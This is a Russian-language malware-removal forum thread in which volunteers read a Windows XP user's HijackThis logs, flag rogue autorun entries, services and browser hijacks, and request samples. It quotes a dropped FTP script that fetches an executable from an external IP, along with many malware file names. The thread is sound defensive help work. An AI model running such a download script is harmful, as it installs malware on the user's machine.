Не поймать вирус, помогите!
Уважаемые Эксперты!
Ситуация такая: сидит какая-то пакость у меня на компе, никак не выловить.
NOD32 последняя версия, со всеми обновлениями, говорит что все чисто.
Но стоит мне выйти в Инет, как в папке system32 появляются файлы, типа: Isass.exe, winamp.exe, iexplore.exe, firewall.exe и подобные названия (каждый раз новое). После чего начинается "торможение", комп может зависнуть.
Выполнил процедуры, описанные в Правилах.
Утилита CureIt ничего не нашла.
Логи AVZ и hijackthis прилагаю.
Надеюсь на помощь.
У меня WindowsXP.
Вложения
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-обновите свою Win XP SP1 до SP2
-пофиксить в HijackThis строки:
Код:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://find-world.com/index_put.php
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://find-world.com/index_put.php
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://treko/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://find-world.com/index_put.php
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://find-world.com/index_put.php
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://find-world.com/index_put.php
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://find-world.com/index_put.php
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://find-world.com/index_put.php
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://find-world.com/index_put.php
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = nusphere-cd
O2 - BHO: (no name) - {e3a729da-eabc-df50-1842-dfd682644311} - C:\WINDOWS\System32\mswapi.dll (file missing)
O3 - Toolbar: &SEOBar - {9AE6E6A3-9EE9-43A0-9D54-CE70CDBB8FC6} - "C:\Program Files\Developing.ru\seobar\seobar.dll" (file missing)
O4 - HKLM\..\Run: [WinDLL (xvd32.dll)] __rundll32.exe C:\WINDOWS\System32\xvd32.dll,start
O4 - HKLM\..\Run: [WinDLL (vdm32.dll)] __rundll32.exe C:\WINDOWS\System32\vdm32.dll,start
O4 - HKLM\..\Run: [WinDLL (v4mon.dll)] __rundll32.exe C:\WINDOWS\System32\v4mon.dll,start
O4 - HKLM\..\Run: [implib] __rundll32.exe C:\WINDOWS\System32\implib.dll,start
O4 - HKLM\..\Run: [Local Security Authority Service] C:\WINDOWS\System32\Isass.exe
O4 - HKCU\..\Run: [SUBST] subst z: C:\Internet
O4 - HKCU\..\Run: [iPlusAgent2] "D:\iriver plus 2\iAgent2.exe"
O4 - HKCU\..\Run: [iriverPlus2] "D:\iriver plus 2\iPlus2.exe"
-пришлите согласно Правил файлы:
Код:
C:\WINDOWS\Downloaded Program Files\yndbar.dll
C:\WINDOWS\System32\xvd32.dll
C:\WINDOWS\System32\vdm32.dll
C:\WINDOWS\System32\v4mon.dll
C:\WINDOWS\System32\implib.dll
C:\WINDOWS\System32\Isass.exe
C:\Internet
D:\iriver plus 2\iAgent2.exe
D:\iriver plus 2\iPlus2.exe
это далеко не всё... дальше терпения не хватает, продолжу чуть позже....
С уважением,
Alex Plutoff
А. ПЛАТОВ
Сообщение от
chief
Но стоит мне выйти в Инет, как в папке system32 появляются файлы, типа: Isass.exe, winamp.exe, iexplore.exe, firewall.exe и подобные названия (каждый раз новое).
если снова создадутся такие файлы - присылайте по правилам форума.
машина конечно загажена страшно. начнем лечить.
пофиксите программой HijackThis следующие строки:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://find-world.com/index_put.php
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://find-world.com/index_put.php
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://treko/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://find-world.com/index_put.php
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://find-world.com/index_put.php
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://find-world.com/index_put.php
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://find-world.com/index_put.php
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://find-world.com/index_put.php
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://find-world.com/index_put.php
N3 - Netscape 7: user_pref("browser.startup.homepage", "http://localhost/klub.php"); (C:\Documents and Settings\Саша\Application Data\Mozilla\Profiles\default\z1b695i7.slt\prefs.j s)
N3 - Netscape 7: user_pref("browser.search.defaultengine", "engine://C%3A%5CProgram%20Files%5CNetscape%5CNetscape%5Csea rchplugins%5CSBWeb_01.src"); (C:\Documents and Settings\Саша\Application Data\Mozilla\Profiles\default\z1b695i7.slt\prefs.j s)
O2 - BHO: (no name) - {e3a729da-eabc-df50-1842-dfd682644311} - C:\WINDOWS\System32\mswapi.dll (file missing)
O4 - HKLM\..\Run: [WinDLL (xvd32.dll)] __rundll32.exe C:\WINDOWS\System32\xvd32.dll,start
O4 - HKLM\..\Run: [WinDLL (vdm32.dll)] __rundll32.exe C:\WINDOWS\System32\vdm32.dll,start
O4 - HKLM\..\Run: [WinDLL (v4mon.dll)] __rundll32.exe C:\WINDOWS\System32\v4mon.dll,start
O4 - HKLM\..\Run: [implib] __rundll32.exe C:\WINDOWS\System32\implib.dll,start
O4 - HKLM\..\Run: [Application Layer Gateway Service] C:\WINDOWS\System32\algs.exe
O4 - HKLM\..\Run: [Spooler SubSystem App] C:\WINDOWS\System32\spooIsv.exe
O4 - HKLM\..\Run: [Local Security Authority Service] C:\WINDOWS\System32\Isass.exe
O4 - HKCU\..\Run: [MSMSGS] ___"C:\Program Files\Messenger\msmsgs.exe" /background
O20 - Winlogon Notify: awvtt - awvtt.dll (file missing)
O20 - Winlogon Notify: awvvw - C:\WINDOWS\System32\awvvw.dll (file missing)
O20 - Winlogon Notify: ddayw - C:\WINDOWS\System32\ddayw.dll (file missing)
O20 - Winlogon Notify: geeby - geeby.dll (file missing)
O20 - Winlogon Notify: jkhfd - C:\WINDOWS\System32\jkhfd.dll (file missing)
O20 - Winlogon Notify: pmkhg - pmkhg.dll (file missing)
O20 - Winlogon Notify: reset5 - reset5.dll (file missing)
O20 - Winlogon Notify: sstqq - C:\WINDOWS\System32\sstqq.dll (file missing)
O20 - Winlogon Notify: ssttt - C:\WINDOWS\System32\ssttt.dll (file missing)
O21 - SSODL: Shell - {7127BDD8-D454-4E48-815F-CFC1B2FC2E33} - mswshell.dll (file missing)
O23 - Service: COM+ System Log (COMSysLog) - Unknown owner - C:\WINDOWS\system32\comsyslog.exe (file missing)
O23 - Service: DcomHelper Service (DcomHelper) - Unknown owner - C:\WINDOWS\dcmhelp.exe (file missing)
O23 - Service: dllmgr64 - Unknown owner - C:\WINDOWS\dllmgr64.exe (file missing)
O23 - Service: fwnet64 (fwnet) - Unknown owner - C:\WINDOWS\fwnet64.exe (file missing)
O23 - Service: Hardware Clock Driver (hwclock) - Unknown owner - C:\WINDOWS\System32\hwclock.exe (file missing)
O23 - Service: K4NV - Unknown owner - C:\WINDOWS\k4nv.exe (file missing)
O23 - Service: Microsoft Windows Service - Unknown owner - C:\WINDOWS\mousesync.exe (file missing)
O23 - Service: Mouelslo - Корпорация Майкрософт - (no file)
O23 - Service: MsHS64 - Unknown owner - C:\WINDOWS\MsHS64.exe (file missing)
O23 - Service: MsLS32 - Unknown owner - C:\WINDOWS\MsLS32.exe (file missing)
O23 - Service: Microsoft Networks DN (msndn) - Unknown owner - C:\WINDOWS\msndn.exe (file missing)
O23 - Service: Windows Genuine Advantage Registration Service (net32a) - Unknown owner - C:\WINDOWS\System32\net32a.exe (file missing)
O23 - Service: netconf32 - Unknown owner - C:\WINDOWS\netconf32.exe (file missing)
O23 - Service: nvidGUIv (nvidGUIv2) - Unknown owner - C:\WINDOWS\nvidGUIv.exe (file missing)
O23 - Service: olecli32 - Unknown owner - C:\WINDOWS\olecli32.exe (file missing)
O23 - Service: sqlmanagement - Unknown owner - C:\WINDOWS\sqlmanagement.exe (file missing)
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe (file missing)
O23 - Service: sysmgr64 - Unknown owner - C:\WINDOWS\sysmgr64.exe (file missing)
O23 - Service: TskScheduler - Unknown owner - C:\WINDOWS\taskshed.exe (file missing)
O23 - Service: Windows User Mode Driver Framework (UMWdf) - Unknown owner - C:\WINDOWS\System32\wdfmgr.exe (file missing)
O23 - Service: Win32 Kernel Update (Win32Kernel) - Unknown owner - C:\WINDOWS\win32host.exe (file missing)
O23 - Service: Win32Sr - Unknown owner - C:\WINDOWS\win32ssr.exe (file missing)
O23 - Service: Win32 Update (Win32Update) - Unknown owner - C:\WINDOWS\oswinupdate.exe (file missing)
O23 - Service: Windows System Host - Unknown owner - C:\WINDOWS\sychost32.exe (file missing)
O23 - Service: wins(WINS) (wins) - Unknown owner - C:\WINDOWS\system32\winscntrl.exe (file missing)
O23 - Service: winupd - Unknown owner - C:\WINDOWS\winupd.exe (file missing)
O23 - Service: wsaugt32 - Unknown owner - C:\WINDOWS\wsaugt32.exe (file missing)
пришлите файлы по правилам форума:
C:\Documents and Settings\Саша\Application Data\Mozilla\Profiles\default\z1b695i7.slt\prefs.j s
C:\Program Files\Developing.ru\seobar\seobar.dll
C:\WINDOWS\System32\v4mon.dll
C:\WINDOWS\System32\vdm32.dll
C:\WINDOWS\System32\xvd32.dll
C:\WINDOWS\System32\implib.dll
C:\WINDOWS\System32\algs.exe
C:\WINDOWS\System32\spooIsv.exe
C:\WINDOWS\System32\Isass.exe
C:\WINDOWS\System32\msnmsgr.exe
а также сделайте новые логи и приложите к теме
Настройки НОД выставлены на максимум? В модуле AMON, в настройках на закладке "Методы" должны стоять все галки. А также в профилях сканирования по требованию должны быть выставлены все галки.
Left home for a few days and look what happens...
Пришлите, как написано в Приложении 2, следующие файлы (что найдётся):
Код:
C:\Program Files\Developing.ru\seobar\seobar.dll
C:\Program Files\Common Files\Windows\mc-110-12-0000247.exe
C:\WINDOWS\System32\Isass.exe
C:\WINDOWS\System32\algs.exe
C:\WINDOWS\System32\awvvw.dll
C:\WINDOWS\System32\ddayw.dll
C:\WINDOWS\System32\jkhfd.dll
C:\WINDOWS\System32\spooIsv.exe
C:\WINDOWS\System32\sstqq.dll
C:\WINDOWS\System32\ssttt.dll
C:\WINDOWS\System32\implib.dll
C:\WINDOWS\System32\v4mon.dll
C:\WINDOWS\System32\vdm32.dll
C:\WINDOWS\System32\xvd32.dll
awvtt.dll
firewall32.exe
geeby.dll
msdtc2k.exe
msn.exe
msnse.exe
mswindtc.exe
mswshell.dll
pmkhg.dll
svcfrorhun.exe
svcsrv32.exe
systemconfig32.exe
C:\WINDOWS\system32\comsyslog.exe
C:\WINDOWS\dcmhelp.exe
C:\WINDOWS\dllmgr64.exe
C:\WINDOWS\fwnet64.exe
C:\WINDOWS\k4nv.exe
C:\WINDOWS\mousesync.exe
C:\WINDOWS\MsHS64.exe
C:\WINDOWS\MsLS32.exe
C:\WINDOWS\msndn.exe
C:\WINDOWS\System32\net32a.exe
C:\WINDOWS\netconf32.exe
C:\WINDOWS\nvidGUIv.exe
C:\WINDOWS\olecli32.exe
C:\WINDOWS\sqlmanagement.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\sysmgr64.exe
C:\WINDOWS\taskshed.exe
C:\WINDOWS\System32\wdfmgr.exe
C:\WINDOWS\win32host.exe
C:\WINDOWS\win32ssr.exe
C:\WINDOWS\oswinupdate.exe
C:\WINDOWS\sychost32.exe
C:\WINDOWS\system32\winscntrl.exe
C:\WINDOWS\winupd.exe
C:\WINDOWS\wsaugt32.exe
А вообще-то скажу крамольную вещь. XP SP1 -> надо обновлять до SP2, иначе так и будете зверей ловить. Reset5, само собой, работать перестанет. Система замусорена до тихого ужаса. Я бы её снёс и поставил начисто систему с SP2.
P.S. Прошу прощения у тех, кто будет смотреть архив, если вдруг найдётся всё перечисленное.
P.P.S. Насколько я понимаю, Seobar можно давить сразу. И, видимо, можно сразу же пофиксить в HijackThis следующие строки:
Код:
O2 - BHO: (no name) - {e3a729da-eabc-df50-1842-dfd682644311} - C:\WINDOWS\System32\mswapi.dll (file missing)
O3 - Toolbar: &SEOBar - {9AE6E6A3-9EE9-43A0-9D54-CE70CDBB8FC6} - "C:\Program Files\Developing.ru\seobar\seobar.dll" (file missing)
O4 - HKLM\..\Run: [Application Layer Gateway Service] C:\WINDOWS\System32\algs.exe
O4 - HKLM\..\Run: [Spooler SubSystem App] C:\WINDOWS\System32\spooIsv.exe
O4 - HKLM\..\Run: [Local Security Authority Service] C:\WINDOWS\System32\Isass.exe
O20 - Winlogon Notify: awvtt - awvtt.dll (file missing)
O20 - Winlogon Notify: awvvw - C:\WINDOWS\System32\awvvw.dll (file missing)
O20 - Winlogon Notify: ddayw - C:\WINDOWS\System32\ddayw.dll (file missing)
O20 - Winlogon Notify: geeby - geeby.dll (file missing)
O20 - Winlogon Notify: jkhfd - C:\WINDOWS\System32\jkhfd.dll (file missing)
O20 - Winlogon Notify: pmkhg - pmkhg.dll (file missing)
O20 - Winlogon Notify: reset5 - reset5.dll (file missing)
O20 - Winlogon Notify: sstqq - C:\WINDOWS\System32\sstqq.dll (file missing)
O20 - Winlogon Notify: ssttt - C:\WINDOWS\System32\ssttt.dll (file missing)
O21 - SSODL: Shell - {7127BDD8-D454-4E48-815F-CFC1B2FC2E33} - mswshell.dll (file missing)
O23 - Service: dllmgr64 - Unknown owner - C:\WINDOWS\dllmgr64.exe (file missing)
O23 - Service: fwnet64 (fwnet) - Unknown owner - C:\WINDOWS\fwnet64.exe (file missing)
O23 - Service: K4NV - Unknown owner - C:\WINDOWS\k4nv.exe (file missing)
O23 - Service: Microsoft Windows Service - Unknown owner - C:\WINDOWS\mousesync.exe (file missing)
O23 - Service: MsHS64 - Unknown owner - C:\WINDOWS\MsHS64.exe (file missing)
O23 - Service: MsLS32 - Unknown owner - C:\WINDOWS\MsLS32.exe (file missing)
O23 - Service: Microsoft Networks DN (msndn) - Unknown owner - C:\WINDOWS\msndn.exe (file missing)
O23 - Service: Windows Genuine Advantage Registration Service (net32a) - Unknown owner - C:\WINDOWS\System32\net32a.exe (file missing)
O23 - Service: netconf32 - Unknown owner - C:\WINDOWS\netconf32.exe (file missing)
O23 - Service: nvidGUIv (nvidGUIv2) - Unknown owner - C:\WINDOWS\nvidGUIv.exe (file missing)
O23 - Service: olecli32 - Unknown owner - C:\WINDOWS\olecli32.exe (file missing)
O23 - Service: sqlmanagement - Unknown owner - C:\WINDOWS\sqlmanagement.exe (file missing)
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe (file missing)
O23 - Service: sysmgr64 - Unknown owner - C:\WINDOWS\sysmgr64.exe (file missing)
O23 - Service: TskScheduler - Unknown owner - C:\WINDOWS\taskshed.exe (file missing)
O23 - Service: Windows User Mode Driver Framework (UMWdf) - Unknown owner - C:\WINDOWS\System32\wdfmgr.exe (file missing)
O23 - Service: Win32 Kernel Update (Win32Kernel) - Unknown owner - C:\WINDOWS\win32host.exe (file missing)
O23 - Service: Win32Sr - Unknown owner - C:\WINDOWS\win32ssr.exe (file missing)
O23 - Service: Win32 Update (Win32Update) - Unknown owner - C:\WINDOWS\oswinupdate.exe (file missing)
O23 - Service: Windows System Host - Unknown owner - C:\WINDOWS\sychost32.exe (file missing)
O23 - Service: wins(WINS) (wins) - Unknown owner - C:\WINDOWS\system32\winscntrl.exe (file missing)
O23 - Service: winupd - Unknown owner - C:\WINDOWS\winupd.exe (file missing)
O23 - Service: wsaugt32 - Unknown owner - C:\WINDOWS\wsaugt32.exe (file missing)
класс - три идентичных сообщения ;-)
Господа!
Спасибо всем!
Только SEOBar - это вполне невинная софтина, взятая отсюда:
http://www.developing.ru/
yndbar.dll - это ЯндексБар, известная вещь.
D:\iriver plus 2\iAgent2.exe
D:\iriver plus 2\iPlus2.exe
- это софт к mp3-плееру iRiver
Остальные файлы я, к сожалению, прибил Касперским. НОД снес, Касперского поставил.
Последний раз редактировалось chief; 19.09.2006 в 09:24 .
Вот, не успел перегрузить компьютер - в system32 возникло чудо под названием .exe. И вскоре исчезло.
Лог прилагаю.
Вложения
В system32 возник файл под названием "i". Пытался его прикрепить по правилам, но программа ругается, говорит что "неверно указана ссылка на тему", хотя ссылка правильная.
Но в общем содержание файла небольшое, вот такое:
open 81.211.92.167 8717
user 1 1
get eraseme_28031.exe
quit
Это управляющий файл для команднострочного FTP-клиента. Ситуация ясна - вас долбают снаружи через то решето, которое из себя представляет сейчас система. Надо ставить заплатки и включать файрвол. Настоятельно рекомендуется обновиться до SP2. IMHO, в нынешнем разгромном состоянии проще будет поставить и настроить систему с нуля.
P.S. Ссылка на тему: http://virusinfo.info/showthread.php?t=6257
Спасибо за помощь!
Файл eraseme_28031.exe сюда закачал, по правилам.
Сообщение от
chief
Спасибо за помощь!
Файл eraseme_28031.exe сюда закачал, по правилам.
Нет, не получилось добавить его в карантин.
Сообщение от
chief
Спасибо всем!
Только SEOBar - это вполне невинная софтина, взятая отсюда:
http://www.developing.ru/
yndbar.dll - это ЯндексБар, известная вещь.
D:\iriver plus 2\iAgent2.exe
D:\iriver plus 2\iPlus2.exe
- это софт к mp3-плееру iRiver
эти файлы запрашиваются для того, чтобы добавить их в базы чистых файлов антивирусной программы, чтобы в дальнейшем вопросов об их чистоте не возникало.
а сделать новые логи AVZ все рано не помешает, поскольку что-то могло остаться.
Еще раз закачал , на этот раз eraseme_51577.exe
Сообщение от
chief
Еще раз закачал , на этот раз eraseme_51577.exe
однозначно троян. проникает в систему из-за того, что есть уязвимость, позволяющая получить доступ к командному интерпретатору.
атака шла с адреса 81.211.92.167. если есть фаервол - заблокируйте всю подсеть.
Сообщение от
chief
Еще раз закачал , на этот раз eraseme_51577.exe
Какаято новая разновидность Win32.HLLW.MyBot. Однозначно только DrWeb его детектирует.
http://www.virustotal.com/vt/en/resu...b8edf21ecd53df
Он у вас сам собой под другим именем появился?
PS. Логи AVZ в любом случае нужны.
Сообщение от
AndreyKa
Он у вас сам собой под другим именем появился?
алгоритм появления этих файлов я могу рассказать
Сообщение от
AndreyKa
Да, конечно.
Логи прилагаю.
Вложения
Сообщение от
chief
Логи прилагаю.
а что толку их прикладывать, если наши рекомендации Вы не выполнили?! судя по логам - на компьютере опять целый зоопарк!
пришлите файлы:
C:\Program Files\Common Files\Windows\mc-110-12-0000247.exe
firewall32.exe
msdtc2k.exe
msn.exe
msnse.exe
mswindtc.exe
svcfrorhun.exe
svcsrv32.exe
systemconfig32.exe
после отправки найденных указанных выше файлов из менеджера автозагрузки программы AVZ (Сервис - Менеджер автозапуска - Реестр - Run*) удалите все строки с упоминанием этих имен файлов.
отдельным архивом пришлите файлы для базы чистых:
D:\VIDEO\rpshell.dll
C:\WINDOWS\Downloaded Program Files\asinst.dll
C:\WINDOWS\Downloaded Program Files\yndbar.dll
C:\WINDOWS\System32\implib.dll
D:\iriver plus 2\iAgent2.exe
D:\iriver plus 2\iPlus2.exe